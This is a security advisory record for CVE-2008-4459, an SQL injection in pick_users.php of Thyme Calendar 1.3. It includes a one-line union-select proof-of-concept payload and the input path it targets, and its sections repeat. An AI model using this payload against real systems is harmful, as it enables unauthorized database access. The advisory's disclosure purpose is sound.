eXtrovert software Thyme 'pick_users.php' SQL Injection Vulnerability
BID:31063
Info
eXtrovert software Thyme 'pick_users.php' SQL Injection Vulnerability
| Bugtraq ID: | 31063 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4459 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 08 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | Omer Singer |
| Vulnerable: |
EXtrovert Software Thyme Calendar 1.3 |
| Not Vulnerable: | |
Discussion
eXtrovert software Thyme 'pick_users.php' SQL Injection Vulnerability
eXtrovert software Thyme is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Thyme 1.3 is affected; other versions may also be vulnerable.
eXtrovert software Thyme is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Thyme 1.3 is affected; other versions may also be vulnerable.
Exploit / POC
eXtrovert software Thyme 'pick_users.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof of concept is available:
Submit the following to the input field at /thyme/modules/groups/pick_users.php:
' union all select proof,of,concept from mysql.db/*
Attackers can use a browser to exploit this issue.
The following proof of concept is available:
Submit the following to the input field at /thyme/modules/groups/pick_users.php:
' union all select proof,of,concept from mysql.db/*
Solution / Fix
eXtrovert software Thyme 'pick_users.php' SQL Injection Vulnerability
Solution:
Reports indicate that the vendor has released an update to address this issue. Symantec has not confirmed this. Please see the references for more information.
Solution:
Reports indicate that the vendor has released an update to address this issue. Symantec has not confirmed this. Please see the references for more information.
References
eXtrovert software Thyme 'pick_users.php' SQL Injection Vulnerability
References:
References:
- The DigiTrust Group: Advisory #080908a - Thyme SQL Injection Vulnerability (Omer Singer)
- Thyme Homepage (EXtrovert Software)